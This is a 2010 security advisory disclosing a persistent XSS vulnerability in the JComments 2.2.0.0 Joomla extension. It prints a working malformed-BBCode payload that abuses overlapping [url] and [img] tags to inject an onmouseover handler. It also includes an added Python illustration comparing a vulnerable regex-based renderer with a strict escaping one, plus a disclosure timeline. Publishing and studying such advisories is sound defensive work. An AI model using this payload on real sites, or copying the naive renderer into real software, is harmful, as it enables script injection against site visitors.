Sunday, 05 September 2010 13:55

JComments 2.2.0.0 suffers from a persistent XSS vulnerability in the way it handles certain BBCodes.

If [url] and [img] tags are available, the following malformed BBCode will result in code execution:

123456789 12345678 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789
[url]x[url]s[/url]s[/url]!
" style="position: absolute; top:0px; left:0px; width: 99em; height: 99em" onmouseover = "location.href = String.fromCharCode( 35,88,83, 83,101, 100,32, 98,121, 32,106, 100,99 )" x="
[url]x[img]s[/url]s[/img]="!">
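
The following is an added illustration, not JComments' code and not part of the original advisory. It assumes a renderer that converts each tag in its own regex pass, and shows how overlapping [url] and [img] tags leave tag content outside a quoted attribute value even when user input is HTML-escaped. Beside it is a strict single-pass renderer that leaves malformed tags as inert text. The names render_naive, render_strict, TAG, SAFE_URL and OVERLAP are hypothetical.

```python
import html
import re

def render_naive(text):
    """One regex pass per tag; each pass rescans the previous pass's HTML."""
    out = html.escape(text)  # user-supplied quotes and angle brackets are escaped
    out = re.sub(r"\[url\](.*?)\[/url\]", r'<a href="\1">\1</a>', out, flags=re.S)
    out = re.sub(r"\[img\](.*?)\[/img\]", r'<img src="\1">', out, flags=re.S)
    return out

# Tag body may not contain brackets, so nested or overlapping tags never match.
TAG = re.compile(r"\[(url|img)\]([^\[\]]*)\[/\1\]")
SAFE_URL = re.compile(r"https?://[^\s\[\]\"'<>]+")

def render_strict(text):
    """Single pass over the raw input; generated HTML is never rescanned."""
    parts, pos = [], 0
    for m in TAG.finditer(text):
        parts.append(html.escape(text[pos:m.start()]))
        kind, body = m.group(1), m.group(2).strip()
        if SAFE_URL.fullmatch(body):
            url = html.escape(body)
            if kind == "url":
                parts.append(f'<a href="{url}" rel="nofollow">{url}</a>')
            else:
                parts.append(f'<img src="{url}" alt="">')
        else:
            parts.append(html.escape(m.group(0)))  # keep as inert literal text
        pos = m.end()
    parts.append(html.escape(text[pos:]))
    return "".join(parts)

# Overlapping tags taken from the advisory's last line, without the trailing text.
OVERLAP = "[url]x[img]s[/url]s[/img]"

if __name__ == "__main__":
    print(render_naive(OVERLAP))   # quotes emitted by the two passes interleave
    print(render_strict(OVERLAP))  # unchanged, rendered as plain text
```

In the naive output the second pass places its own quote characters inside the href value written by the first pass, so whatever text sits between the overlapping tags is parsed by the browser as attributes of the anchor.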

Timeline

  • Vulnerabilities Discovered: 23 August 2010
  • Vendor Notified: 24 August 2010
  • Vendor Response: 25 August 2010
  • Update Available: ... 2010
  • Disclosure: 5 September 2010
Last Updated on Thursday, 30 September 2010 17:37

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
